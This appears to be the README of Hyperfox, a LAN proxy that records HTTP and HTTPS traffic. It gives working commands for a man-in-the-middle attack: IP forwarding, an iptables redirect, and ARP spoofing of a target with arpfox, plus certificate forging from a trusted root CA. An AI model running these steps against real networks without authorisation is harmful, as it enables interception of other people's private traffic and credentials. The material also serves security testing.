Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.
Hyperfox is capable of forging SSL certificates on the fly if you provide it with a root CA certificate and its corresponding key. If the target machine recognizes the root CA as trusted, then HTTPs traffic can be successfully decrypted, intercepted and recorded.
This is the development repository, check out the https://hyperfox.org site for usage information.
Get hyperfox
You can install hyperfox to /usr/local/bin
with the following command (requires admin privileges):
You can also grab the latest release from our releases page and install it manually into another location.
Build it yourself
In order to build hyperfox
you’ll need Go and a C compiler:
go install github.com/malfunkt/hyperfox
Running hyperfox and arpfox on Linux
The following example assumes that Hyperfox is installed on a Linux box (host) on which you have root access or sudo privileges and that the target machine is connected on the same LAN as the host.
We are going to use the arpfox tool to alter the ARP table of the target machine in order to make it redirect its traffic to Hyperfox instead of to the legitimate LAN gateway. This is an ancient technique known as ARP spoofing.
First, identify both the local IP of the legitimate gateway and its matching network interface.
sudo route
# Kernel IP routing table
# Destination Gateway Genmask Flags Metric Ref Use Iface
# default 10.0.0.1 0.0.0.0 UG 1024 0 0 wlan0
# ...
The interface in our example is called wlan0
and the interface’s gateway is 10.0.0.1
.
export HYPERFOX_GW=10.0.0.1
export HYPERFOX_IFACE=wlan0
Then identify the IP address of the target, let’s suppose it is 10.0.0.143
.
export HYPERFOX_TARGET=10.0.0.143
Enable IP forwarding on the host for it to act (temporarily) as a common router.
sudo sysctl -w net.ipv4.ip_forward=1
Issue an iptables
rule on the host to instruct it to redirect all traffic that goes to port 80 (commonly HTTP) to a local port where Hyperfox is listening to (1080).
sudo iptables -A PREROUTING -t nat -i $HYPERFOX_IFACE -p tcp --destination-port 80 -j REDIRECT --to-port 1080
We’re almost ready, prepare Hyperfox to receive plain HTTP traffic:
hyperfox
# ...
# 2014/12/31 07:53:29 Listening for incoming HTTP client requests on 0.0.0.0:1080.
Finally, run arpfox
to alter the target’s ARP table so it starts sending its network traffic to the host box:
sudo arpfox -i $HYPERFOX_IFACE -t $HYPERFOX_TARGET $HYPERFOX_GW
and watch the live traffic coming in.
Add Comment